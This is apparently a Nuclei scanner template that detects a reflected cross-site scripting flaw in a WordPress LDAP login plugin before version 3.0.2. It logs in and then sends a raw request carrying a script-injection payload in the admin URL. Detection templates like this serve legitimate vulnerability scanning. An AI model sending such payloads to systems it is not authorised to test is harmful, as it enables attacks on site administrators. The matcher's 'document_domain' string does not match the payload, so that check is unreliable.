Description
The plugin does not escape generated URLs before outputing them in attrubutes, leading to Reflected Cross-Site Scripting
The plugin does not escape generated URLs before outputing them in attrubutes, leading to Reflected Cross-Site Scripting
id: ldap-wp-login-xss
info:
name: Ldap WP Login / Active Directory Integration < 3.0.2 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
The plugin does not escape generated URLs before outputing them in attrubutes, leading to Reflected Cross-Site Scripting
remediation: Fixed in version 3.0.2
reference:
- https://wpscan.com/vulnerability/1dc2cec8-e3dd-414b-8ccb-d73d51b051ee
classification:
cwe-id: CWE-80
metadata:
verified: true
max-request: 2
tags: xss,wp-plugin,wordpress,wp,ldap-wp-login-integration-with-active-directory,wpscan,vuln
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=LDAP+authentication+intergrating+with+AD&a"><script>alert(document.domain)</script> HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(header_2, "text/html")'
- 'contains_all(body_2, "<script>alert(document_domain)</script>", "LDAP-authentication-intergrating-with-AD")'
condition: and
# digest: 4a0a0047304502200106af73fe0ea56491d59119095dd9497626b495f879ca42cb08bd6efcecb1e802210099bab4672eb4d2858bcef9219e82b48673585681038822f5f82505876f36bbe3:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.